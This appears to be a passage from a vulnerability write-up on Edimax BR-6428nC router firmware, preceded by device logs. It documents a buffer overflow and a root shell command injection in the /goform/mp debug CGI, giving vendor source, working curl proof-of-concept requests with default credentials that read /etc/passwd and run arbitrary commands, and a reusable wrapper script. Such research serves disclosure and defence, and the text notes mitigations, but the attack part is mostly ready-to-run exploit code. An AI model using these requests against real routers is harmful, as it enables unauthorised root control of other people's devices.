Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
    pkts      bytes target     prot opt in     out     source               destination         

#############################
#          df               #
#############################

#############################
#      security log         #
#############################
[2000-01-01 00:00:19]: start Dynamic IP
[2000-01-01 00:00:23]: [SNTP]: connect to TimeServer 72.30.35.88 ...
[2020-05-02 15:35:18]: [SNTP]: connect success!
[2020-05-02 15:35:18]: [SNTP]: set time to 2020-05-02 15:35:18
[2020-05-02 15:35:18]: [Firewall]: WAN1 IP is 192.168.86.32
[2020-05-02 15:35:18]: [Firewall]: WAN2 IP is 0.0.0.0
[2020-05-02 15:35:18]: [Firewall]: WAN3 IP is 0.0.0.0
[2020-05-02 15:35:18]: [Firewall]: setting firewall...
[2020-05-02 15:35:21]: [SNTP]: connect to TimeServer 144.76.100.49 ...
[2020-05-02 15:35:22]: [SNTP]: connect success!
[2020-05-02 15:35:22]: [SNTP]: set time to 2020-05-02 15:35:22

#############################
#      SNTP log             #
#############################
SNTP: ip = 144.76.100.49 tz_minute = 0 [GMT+00:00]
SNTP: SUCCESS, Sat May  2 15:35:22 2020

#############################
#      DHCP client log      #
#############################

# [2000-01-01 00:00:20]: start DHCP client log #

orig_subnet=255.255.255.0
OLD_IP=192.168.86.32
OLD_BROADCAST=192.168.86.255
OLD_SUBNET=255.255.255.0
OLD_ROUTER="192.168.86.1"
OLD_DOMAIN=lan
OLD_DNS="192.168.86.1"


#############################
#      DNS log              #
#############################
<<< Auto setting DNS >>>
Use command:  --server=192.168.86.1

#############################
#      Route log            #
#############################
Date: 2000-01-01 00:00:21
delete old route rule-> Host: 192.168.86.0 Gateway: 0.0.0.0
delete old route rule-> Host: 192.168.2.0 Gateway: 0.0.0.0

#############################
#         WAN1  Debug       #
#############################
ping -c 3 168.95.1.1
PING 168.95.1.1 (168.95.1.1): 56 data bytes
64 bytes from 168.95.1.1: seq=0 ttl=49 time=290.000 ms
64 bytes from 168.95.1.1: seq=1 ttl=49 time=290.000 ms
64 bytes from 168.95.1.1: seq=2 ttl=49 time=290.000 ms

--- 168.95.1.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 290.000/290.000/290.000 ms
ping -c 3 220.210.194.67
PING 220.210.194.67 (220.210.194.67): 56 data bytes

--- 220.210.194.67 ping statistics ---
3 packets transmitted, 0 packets received, 100% packet loss
ping -c 3 www.google.com.tw
PING www.google.com.tw (216.58.207.67): 56 data bytes
64 bytes from 216.58.207.67: seq=0 ttl=55 time=20.000 ms
64 bytes from 216.58.207.67: seq=1 ttl=55 time=20.000 ms
64 bytes from 216.58.207.67: seq=2 ttl=55 time=10.000 ms

--- www.google.com.tw ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 10.000/16.666/20.000 ms
ping www.flets

#############################
#          syslog           #
#############################
Jan  1 00:00:06 (none) syslog.info syslogd started: BusyBox v1.11.1
May  2 15:35:30 (none) user.notice syslog: Note: adding VIF, idx=0 Fl flags=0x0 IP=192.168.2.1 br0
May  2 15:35:30 (none) user.notice syslog: Note: adding VIF, idx=1 Fl flags=0x0 IP=192.168.86.32 eth1

Buffer Overflow

Some of the CGI methods listed in the previous section have a temporary memory on the stack which triggers a buffer overflow when exceeded.

Edimax BR-6428nC v1.16: Methods with overflow potential
formAccept  (Buffer: 200Byte; Parameters: {"submit-url"})
formReboot  (Buffer: 200Byte; Parameters: {"submit-url"})
formApply   (Buffer: 200Byte; Parameters: {"submit-url"})
formConnect (Buffer: 200Byte; Parameters: {"submit-url"})
formPasswordSetup (Buffer: 100Byte; Parameter: {"newpass", "oldpass"})
mp          (Buffer: 500Byte; Parameters: {"command"})
Note: The parameter "submit-url" is used to set window.location.replace in the responding javascript.
Proof-of-Concept
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
curl: (52) Empty reply from server

Shell Command Injection

From the CGI methods discussed in the previous section, the one that deserves special attention is the mp method, which allows to pass parameter to a shell script called rftest.sh with root priviledges in sequence. This offers the possibility of command injection. None of the other CGI methods allow this except formHwSet, which seems to be disabled. The mp method itself seems to have been designed for debugging the WLAN interface. One could easily disable it for a production environment by setting the C pre-compiler variable _HIDING_CGI_MP_PAGE_ accordingly.

fmmgmt.c: mp()
#ifdef _HIDING_CGI_MP_PAGE_
void mp(webs_t wp, char_t *path, char_t *query)
{
	char_t *command;
	char temp[500];
	FILE *ptr;
	int i;
	command = websGetVar(wp, T("command"), T(""));
	websHeader(wp);//<html>
	websWrite(wp, T("<head>\n"));
	websWrite(wp, T("  <style>body { color: #333333; font: 9pt/18px \"Monospace\";font-weight:bold; }</style>\n"));
	websWrite(wp, T("<script type=\"text/javascript\" src=\"/file/javascript.js\"></script>"));
	websWrite(wp, T("</head>\n"));
	websWrite(wp, T("<body>\n"));
	websWrite(wp, T("  <form action=\"/goform/mp\" method=\"POST\" name=\"mp\">\n"));
	websWrite(wp, T("  	<input type=\"text\" name=\"command\" value=\"\">&nbsp;<input type=\"submit\" value=\"GO\">\n"));
	websWrite(wp, T("<input type=\"hidden\" name=\"getID\" value=\"\">&nbsp;"));
	websWrite(wp, T("  </form>\n"));

	if(command)
	{
		if( strchr(command,';') !=NULL )  *strchr(command,';')='\0';  //如果有分號,把第一個分號改成\0

		websWrite(wp, T("<font color=\"red\">#&nbsp;"));
		for(i=0;i<strlen(command);i++)
		{
			switch(command[i])
			{
				case '\n': websWrite(wp, T("<br>\n")); break;
				case ' ': websWrite(wp, T("&nbsp;")); break;
				case '\0': websWrite(wp, T("")); break;
				default: websWrite(wp, T("%c"),command[i]); break;
			}
		}
		websWrite(wp, T("</font><br>\n"));

		#ifdef __TARGET_BOARD__
    		sprintf(temp,"/bin/rftest.sh %s > /tmp/rftest.out",command);
		#else
			sprintf(temp,"../../script/rftest.sh %s > /tmp/rftest.out",command);
		#endif
		system(temp);
		if((ptr=fopen("/tmp/rftest.out","r"))!=NULL)
		{
			while(fgets(temp,100, ptr)>0)
			{
				for(i=0;i<strlen(temp);i++)
				{
					switch(temp[i])
					{
						case '\n': websWrite(wp, T("<br>\n")); break;
						case ' ': websWrite(wp, T("&nbsp;")); break;
						case '\0': websWrite(wp, T("")); break;
						default: websWrite(wp, T("%c"),temp[i]); break;
					}
				}
			}
			fclose(ptr);
			system("rm -f /tmp/rftest.out");
		}
	}
	websWrite(wp, T("\n</body><script type=\"text/javascript\">document.mp.command.focus()</script>\n"));
	websFooter(wp);//</html>
	websDone(wp, 200);
}
#endif
rftest.sh
#!/bin/sh
if [ $# -lt 1 ]; then echo "Usage: $0 interface {wait|no]";  exit 1 ; fi
WLAN_INTERFACE="wlan0"
SET_WLAN="iwpriv $WLAN_INTERFACE set_mib"
WRITE_E2P="iwpriv $WLAN_INTERFACE e2p"
READ_E2P="iwpriv $WLAN_INTERFACE e2p"
CNT_TIME=2000
SLEEP_TIME=10
case "$1" in
"ENABLEWIRELESS")
/bin/wlan.sh ra0 1
brctl addif br0 ra0
;;
"CARRIER")
$SET_WLAN ATE=ATESTART
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ATETXMODE=$3
$SET_WLAN ATETXMCS=$4
$SET_WLAN ATETXBW=$5
$SET_WLAN ATETXCNT=$6
$SET_WLAN ATETXFREQOFFSET=$7
$SET_WLAN ATE=TXFRAME
$SET_WLAN ATE=TXCARR
echo ateFunc = $1
echo ateChan = $2
echo ateMode = $3
echo MCS = $4
echo ateBW = $5
echo ateTxCount = $6
echo ateOffset = $7
;;
"OFFSET")
$SET_WLAN ATETXFREQOFFSET=$2
echo ateFunc = $1
echo ateOffset = $2
;;
"TXCONT")
$SET_WLAN ATE=ATESTART
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ATETXMODE=$3
$SET_WLAN ATETXMCS=$4
$SET_WLAN ATETXBW=$5
$SET_WLAN ATETXCNT=$6
$SET_WLAN ATE=TXFRAME
$SET_WLAN ATETXANT=$7
$SET_WLAN ATE=TXCONT
if [ $7 = 0 ]; then
$SET_WLAN ATETXPOW0=$8
$SET_WLAN ATETXPOW1=$8
elif [ $7 = 1 ]; then
$SET_WLAN ATETXPOW0=$8
elif [ $7 = 2 ]; then
$SET_WLAN ATETXPOW1=$8
fi
echo ateFunc = $1
echo ateChan = $2
echo ateMode = $3
echo MCS = $4
echo ateBW = $5
echo ateTxCount = $6
echo ateAntenna = $7
echo ateGain = $8
;;
"CHANNEL")
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ATE=TXFRAME
$SET_WLAN ATE=TXCONT
echo ateChan = $2
;;
"TXPOWER")
$SET_WLAN ATETXANT=$2
if [ $2 = 0 ]; then
$SET_WLAN ATETXPOW0=$3
$SET_WLAN ATETXPOW1=$3
elif [ $2 = 1 ]; then
$SET_WLAN ATETXPOW0=$3
elif [ $2 = 2 ]; then
$SET_WLAN ATETXPOW1=$3
fi
echo ateFunc = $1
echo ateAntenna = $2
echo ateGain = $3
;;
"TXPACKET")
$SET_WLAN ATE=ATESTART
$SET_WLAN ATEDA=FF:FF:FF:FF:FF:FF
$SET_WLAN ATESA=00:aa:bb:cc:dd:ee
$SET_WLAN ATEBSSID=01:22:33:44:55:66
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ATETXMODE=$3
$SET_WLAN ATETXMCS=$4
$SET_WLAN ATETXBW=$5
$SET_WLAN ATETXCNT=$6	
$SET_WLAN ATETXANT=$7
$SET_WLAN ATETXGI=0
$SET_WLAN ATETXLEN=1024
$SET_WLAN ATETXPOW0=$8
$SET_WLAN ATETXPOW1=$8
$SET_WLAN ATE=TXFRAME
echo ateFunc = $1
echo ateChan = $2
echo ateMode = $3
echo MCS = $4
echo ateBW = $5
echo ateTxCount = $6
echo ateAntenna = $7
echo ateGain = $8
;;
"RXFRAME")
$SET_WLAN ATE=ATESTART
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ResetCounter=0
$SET_WLAN ATETXFREQOFFSET=$3
$SET_WLAN ATETXMODE=$4
$SET_WLAN ATETXMCS=$5
$SET_WLAN ATETXBW=$6
$SET_WLAN ATE=RXFRAME
$SET_WLAN ATERXANT=$7
$SET_WLAN ATERXFER=1
echo ateFunc = $1
echo ateChan = $2
echo ateOffset =$3
echo ateMode = $4
echo MCS = $5
echo ateBW = $6
echo ateAntenna = $7
;;
"RXFRAME_RESULT")
iwpriv ra0 stat | grep ^R | grep -v RTS | grep -v duplicate | grep -v resource
;;
"ATESTOP")
echo "ATESTOP"
$SET_WLAN ATE=ATESTART
;;
"E2PTXFREQOFFSET")
height=`iwpriv ra0 e2p 3A | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-4`
$WRITE_E2P 3A=$height$2
echo ateFunc = $1
echo $WRITE_E2P 3A=$height$2
;;
"READTX1")
tx11=`$READ_E2P 52 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx12=`$READ_E2P 54 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`	
tx13=`$READ_E2P 56 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`	
tx14=`$READ_E2P 58 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`	
tx15=`$READ_E2P 5A | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`	
tx16=`$READ_E2P 5C | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx17=`$READ_E2P 5E | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
echo "$tx11 $tx12 $tx13 $tx14 $tx15 $tx16 $tx17"
;;
"READTX2")
tx21=`$READ_E2P 60 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx22=`$READ_E2P 62 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`	
tx23=`$READ_E2P 64 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`	
tx24=`$READ_E2P 66 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`	
tx25=`$READ_E2P 68 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`	
tx26=`$READ_E2P 6A | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx27=`$READ_E2P 6C | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
echo "$tx21 $tx22 $tx23 $tx24 $tx25 $tx26 $tx27"
;;
"READDELTA")
delta1=`$READ_E2P 50 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta2=`$READ_E2P DE | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta3=`$READ_E2P E0 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta4=`$READ_E2P E2 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta5=`$READ_E2P E4 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta6=`$READ_E2P E6 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta7=`$READ_E2P E8 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta8=`$READ_E2P EA | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta9=`$READ_E2P EC | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta10=`$READ_E2P EE | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
echo "$delta1 $delta2 $delta3 $delta4 $delta5 $delta6 $delta7 $delta8 $delta9 $delta10"
;;
"READEEPALL")
START=$2
END=$3
ADDR=$START
while [ $ADDR -le $END ];
do
DATA=`$READ_E2P $ADDR | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
echo $ADDR:"$DATA"
ADDR=`expr $ADDR + 2`
done
;;
"READE2P")
readValue=`iwpriv ra0 e2p $2 | grep :0x | grep -v grep | cut -f 2 -d : |  cut -b 3-6`
echo $readValue
;;
"E2PTX1")
$WRITE_E2P 52=$2
$WRITE_E2P 54=$3
$WRITE_E2P 56=$4
$WRITE_E2P 58=$5
$WRITE_E2P 5A=$6
$WRITE_E2P 5C=$7
$WRITE_E2P 5E=$8	
;;
"E2PTX2")
$WRITE_E2P 60=$2
$WRITE_E2P 62=$3
$WRITE_E2P 64=$4
$WRITE_E2P 66=$5
$WRITE_E2P 68=$6
$WRITE_E2P 6A=$7
$WRITE_E2P 6C=$8
;;
"E2PDELTA")
$WRITE_E2P 50=$2
$WRITE_E2P DE=$3
$WRITE_E2P E0=$4
$WRITE_E2P E2=$5
$WRITE_E2P E4=$6
$WRITE_E2P E6=$7
$WRITE_E2P E8=$8
$WRITE_E2P EA=$9
$WRITE_E2P EC=$10
$WRITE_E2P EE=$11
;;
"RESETE2P")
ifconfig ra0 down
ifconfig ra1 down
ifconfig ra2 down
ifconfig ra3 down
ifconfig ra4 down
ifconfig ra5 down
ifconfig ra6 down
ifconfig ra7 down
ifconfig apcli0 down
iwpriv ra0 e2p 0=0
ifconfig ra0 down
ifconfig ra0 up
brctl addif br0 ra0
;;
"SETPN")
eval `cat /web/FUNCTION_SCRIPT | grep _MODE_`
eval `cat /web/FUNCTION_SCRIPT | grep _MODEL_`
flash set HW_11N_RESERVED8 1
HW_WLAN_ADDR7=$2
flash set HW_WLAN_ADDR7 $HW_WLAN_ADDR7
PIN_CODE=`flash get HW_WLAN_ADDR7 | cut -d '=' -f 2 | cut -b 3-`
if [ "$_MODE_" = "Buffalo" ]; then
AutoWPAKey=`AutoWPA $PIN_CODE wpamac`	
else
AutoWPAKey=`AutoWPA $PIN_CODE`
fi
flash set WLAN_WPA_PSK $AutoWPAKey
echo PIN_CODE=$PIN_CODE
echo WLAN_WPA_PSK=$AutoWPAKey
;;
"PINCODE")
PIN_CODE=`flash get WPS_PIN_CODE | cut -d '=' -f 2 |cut -d "'" -f 2`
echo PINCODE=$PIN_CODE
;;
"WRITEDATA")
flash set HW_REG_DOMAIN $2
echo "`flash get HW_REG_DOMAIN`"
flash set HW_NIC0_ADDR $3
echo "`flash get HW_NIC0_ADDR`"
flash set HW_NIC1_ADDR $4
echo "`flash get HW_NIC1_ADDR`"
flash set HW_WLAN_ADDR $3
echo "`flash get HW_WLAN_ADDR`"
if [ "$5" != "" ]; then
flash set HW_WLAN_ADDR1 $5
echo "`flash get HW_WLAN_ADDR1`"
if [ "$6" != "" ]; then
flash set HW_WLAN_ADDR2 $6
echo "`flash get HW_WLAN_ADDR2`"
if [ "$7" != "" ]; then
flash set HW_WLAN_ADDR3 $7
echo "`flash get HW_WLAN_ADDR3`"
if [ "$8" != "" ]; then
flash set HW_WLAN_ADDR4 $8
echo "`flash get HW_WLAN_ADDR4`"
if [ "$9" != "" ]; then
flash set HW_WLAN_ADDR5 $9
echo "`flash get HW_WLAN_ADDR5`"
if [ "$10" != "" ]; then
flash set HW_WLAN_ADDR6 $10
echo "`flash get HW_WLAN_ADDR6`"
if [ "$11" != "" ]; then
flash set HW_WLAN_ADDR7 $11
echo "`flash get HW_WLAN_ADDR7`"
fi
fi
fi
fi
fi
fi
fi
;;
"READDATA")
LANMAC=`flash get HW_NIC0_ADDR`
WANMAC=`flash get HW_NIC1_ADDR`
WLANMAC=`flash get HW_WLAN_ADDR`
WLANMAC1=`flash get HW_WLAN_ADDR1`
WLANMAC2=`flash get HW_WLAN_ADDR2`
WLANMAC3=`flash get HW_WLAN_ADDR3`
WLANMAC4=`flash get HW_WLAN_ADDR4`
WLANMAC5=`flash get HW_WLAN_ADDR5`
WLANMAC6=`flash get HW_WLAN_ADDR6`
WLANMAC7=`flash get HW_WLAN_ADDR7`
DOMAIN=`flash get HW_REG_DOMAIN`
echo "$DOMAIN"
echo "$LANMAC"
echo "$WANMAC"
echo "$WLANMAC"
echo "$WLANMAC1"
echo "$WLANMAC2"
echo "$WLANMAC3"
echo "$WLANMAC4"
echo "$WLANMAC5"
echo "$WLANMAC6"
echo "$WLANMAC7"
echo "`cat /web/FUNCTION_SCRIPT | grep _MODE_= | cut -f 2`"
if [ "`cat /web/FUNCTION_SCRIPT | grep _MODE_= | cut -f 2 -d \\\"`" = "PCI" ]; then
MODEL="`cat /web/FUNCTION_SCRIPT | grep _MODEL_= | cut -f 2 -d \\\"`"
echo _MODEL_="\"$MODEL\""
else
echo "`cat /web/FUNCTION_SCRIPT | grep _MODEL_= | cut -f 2`"
fi
if [ "`cat /web/FUNCTION_SCRIPT |grep FIX_VERSION`" ]; then
echo "Version=`cat /etc/version|cut -f 1 -d \"-\"`"
else
echo "Version=`cat /etc/version`"
fi
echo "`flash get HW_11N_TRSWITCH`"
echo "`flash get WPS_PIN_CODE`"
if [ "`cat /web/FUNCTION_SCRIPT |grep FIX_VERSION`" ]; then
echo "Rev=`cat /etc/version|cut -f 2 -d \"-\"`"
fi
;;
"SETMAC")
flash set HW_NIC0_ADDR $2
flash set HW_NIC1_ADDR $3
flash set HW_WLAN_ADDR $2
FMAC1=`echo  $2 | cut -b 0-2`
FMAC2=`echo  $2 | cut -b 3-4`
FMAC3=`echo  $2 | cut -b 5-6`
FMAC4=`echo  $2 | cut -b 7-8`
FMAC5=`echo  $2 | cut -b 9-10`
FMAC6=`echo  $2 | cut -b 11-12`
iwpriv ra0  e2p 4=$FMAC2$FMAC1
iwpriv ra0  e2p 6=$FMAC4$FMAC3
iwpriv ra0  e2p 8=$FMAC6$FMAC5
if [ "$4" != "" ]; then
flash set HW_REG_DOMAIN $4
fi
if [ "$5" != "" ]; then
ifconfig $_WAN_IF_ $5	
fi		
ifconfig eth2 down
ifconfig eth2 hw ether $2
ifconfig eth2 up
if [ "$_IS_GATEWAY_" = "y" ]; then
ifconfig $_LAN_IF_ down
ifconfig $_LAN_IF_ hw ether $2
ifconfig $_LAN_IF_ up 		
brctl delif br0 $_LAN_IF_	
brctl addif br0 $_LAN_IF_	
ifconfig $_WAN_IF_ down
ifconfig $_WAN_IF_ hw ether $3
ifconfig $_WAN_IF_ up 					
fi
ifconfig ra0 down
ifconfig ra0 up
brctl delif br0 ra0	
brctl addif br0 ra0		
;;
"ATED")
vconfig add eth2 1
ifconfig $_LAN_IF_ up
brctl addif br0 $_LAN_IF_
killall ated
sleep 1
ated
;;
"TRSW")
flash set HW_11N_TRSWITCH $2
echo "`flash get HW_11N_TRSWITCH`"
;;
"GENPIN")
flash set WPS_PIN_CODE ""
flash gen-pin
;;
"PCI_SSID")
mac_last_6="`flash get HW_WLAN_ADDR | cut -b20-`"
echo "Main SSID=ap-pc-${mac_last_6}"
echo "Multiple SSID1=ap-game-${mac_last_6}"
;;
"BUTTONTESTSTART")
echo 1 > /proc/wlan_led 
echo 1 > /proc/power_led
kill -9  `pidof cleanlog.sh`
kill -9  `pidof reload`
echo "finish!"
;;
"BUTTONTESTEND")
/bin/reload &
/bin/cleanlog.sh &
echo 2 > /proc/wlan_led
echo "finish!"
;;
"BUTTONTEST")
if [ -f "/proc/pci_threeway_switch" ]; then
temp="`cat /proc/pci_threeway_switch`"
else
temp="`cat /proc/rf_switch`"
fi
echo "RF_switch:"$temp
;;
"WPSBUTTONTEST")
wpspush="`cat /proc/wps_but`"
echo "WPS button pushed :"$wpspush
;;
"LANWANBRIDGE")
ifconfig eth1 down
echo 1 > /proc/wan_port
brctl addif br0 eth1
ifconfig eth1 up
;;
"COMMAND")	
if [ "$2" = "ifconfig" ] || [ "$2" = "brctl" ] || [ "$2" = "flash" ] || [ "$2" = "cat" ] || [ "$2" = "echo" ] || [ "$2" = "cd" ] || [ "$2" = "sleep" ]  || [ "$2" = "kill" ] || [ "$2" = "iwpriv" ] || [ "$2" = "reboot" ] || [ "$2" = "ated" ] || [ "$2" = "AutoWPA" ] || [ "$2" = "iperf" ] ; then
$2 $3 $4 $5 $6
fi
;;
esac

When calling http://edimax.setup/goform/mp by Get or Post one can send multiple values for the parameter command as one can see from the rftest.sh. There is one special command called COMMAND. The special about this command is that it accepts multiple space-delimited parameters. The script then compares the second value of the command against a list of accepted values, including ifconfig, brctl, flash, cat, echo, cd, sleep, kill, iwpriv, reboot, ated, AutoWPA, iperf. These commands in themselves are already very interesting but once the script detects one of the values before as second parameter ($2) after COMMAND ($1), it will execute $2 $3 $4 $5 $6. (e.g. "command=COMMAND $1 $2 $3 $4 $5 $6") Any additional parameter will be omitted. Now, when sending command=COMMAND echo "$(████████)" or command=COMMAND echo "`████████`" one can execute almost any command represented by █ here. It somehow failed when using ||, ; or &&.

Proof-of-Concept
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=COMMAND echo $(pwd)'

/etc/boa
Note: pwd is not in the list of allowed commands.
Note: A list of available commands can be found from the firmware extraction.
Example 1: cat /etc/passwd
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=COMMAND cat /etc/passwd'

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/var/ftp:
nobody:x:99:99:Nobody:/:
nscd:x:28:28:NSCD Daemon:/:/bin/false
mailnull:x:47:47::/var/spool/mqueue:/dev/null
ident:x:98:98:pident user:/:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
john:x:500:500:John Huang:/home/john:/bin/tcsh
dliu:x:501:501::/home/dliu:/bin/tcsh
odysseus:x:502:502::/home/odysseus:/bin/tcsh
ygtai:x:503:503::/home/ygtai:/bin/tcsh
hcjong:x:504:504::/home/hcjong:/bin/tcsh
rpm:x:37:37::/var/lib/rpm:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
named:x:25:25:Named:/var/named:/bin/false
pcap:x:77:77::/var/arpwatch:/bin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
Note: No according shadow file has been found.
Example 2: GENPIN
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=GENPIN'

Get last  8 characters of HW_NIC0_ADDR = 38F8DEE4
Generate MAC = 955834084
Generate 10 PIN numbers = 955834084
ping code 58340844
Generated PIN = 58340844
Example 3: echo $USER
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=COMMAND echo $USER'

root

Besides having the possibility to inject nested commands to the script fttest.sh, the mp method in fmmgmt.c, who calls that script, provides yet another option for code injection which is based on the same CGI call, but instead of using the script fttest.sh itself in combination with nested commands, we can ignore that script by not passing any parameters to it and using a pipe (|) instad to execute any other command. This we will use the system() call in the mp() method directrly to subsequently execute or inject commands. Simplified: system(/bin/rftest.sh ████████ > /temp/rftest.out). ████████ stands for the parameter command=COMMAND | ████████ send with the CGI call, and can be replaced by any command you would usually use when having access to a root shell. But beware that only the stdout stream that will reach > /tmp/rftest.out, will be send back to the CGI caller. A simple REGEX could easyly prevent this kind of injection by filtering incomming commands containing |&$`"; or any other method able of detecting illegal characters to prevent unintended command executions. The code only checks for the first occurance of ;, nothing more.

mp.sh: For a more comfortable use. Also removes the HTML body.
#!/bin/bash

USER="admin"
PASS="1234"
IP="192.168.2.1"

curl --user $ADMIN:$PASS $IP/goform/mp --data "command=COMMAND | $1" 2>/dev/null |\
     sed "s/&nbsp;/ /g" |\
     sed "s/<br>//g" |\
     tail -n +10 |\
     head -n -3
Proof-of-Concept
$ ./mp.sh "ls -C /sbin /bin /usr/bin /usr/sbin"

/usr/sbin:
crond   udhcpd  pppd

/usr/bin:
arping    tail      head      basename  tr
cut       killall   wc        top       expr

/bin:
accessctl.sh         iptables             webs
sntpclock            mssid.sh             BSrestoreChan.sh
http_proxy.sh        lld2d                mini_upnpd
wlanapp.sh           hwset.sh             txpower_select.sh
ez-ipupdate          scriptlib.sh         mknod
setpppoe.sh          portfw.sh            sch_reboot.sh
detect_Link.sh       alg.sh               ping
init_ap.sh           pidof                vlan.sh
ash                  dnrd                 l2tp.sh
cleanlog.sh          txpower_INDIA.sh     reset.sh
interrupt.sh         wpstool              date.sh
txpower.sh           pptpd.sh             edx_cloud
dhcpc.sh             del-route.sh         l2tpd
fixedip.sh           vserver.sh           ls
killapp.sh           wlan.sh              mount
touch                sleep                dnrd.sh
cp                   triggerport.sh       upnp.sh
pppoe.sh             run_iqv2.sh          ipup.sh
init.sh              wps_Led.sh           wan-status.sh
QoS.sh               mkdir                wps_daemon.sh
parentalcontrol.sh   debugMsg.sh          wscd
getstatus.sh         savelog.sh           nbnsd
intrusion.sh         multidmz.sh          firewall.sh
urlblocking.sh       miniupnp.sh          setl2tp.sh
l2tp_2.sh            busybox              sntp.sh
ps                   setsip.sh            remote.sh
radio_on_off.sh      igmpproxy            rm
txpower_V3.sh        ipcalc               watchdog.sh
miniigd              ddns.sh              grep
wlan2band.sh         ip                   axhttpd
sh                   nbtscan              disconnect.sh
pod.sh               iapp                 create_l2tp_conf.sh
wiz_dhcpc.sh         pptp                 pppd
rftest.sh            date                 setssidmac.sh
scriptlib_util.sh    urlname.sh           pppoe
fping                seclog.sh            ezqos.sh
duallaccess.sh       ln                   sdmzWanCheck.sh
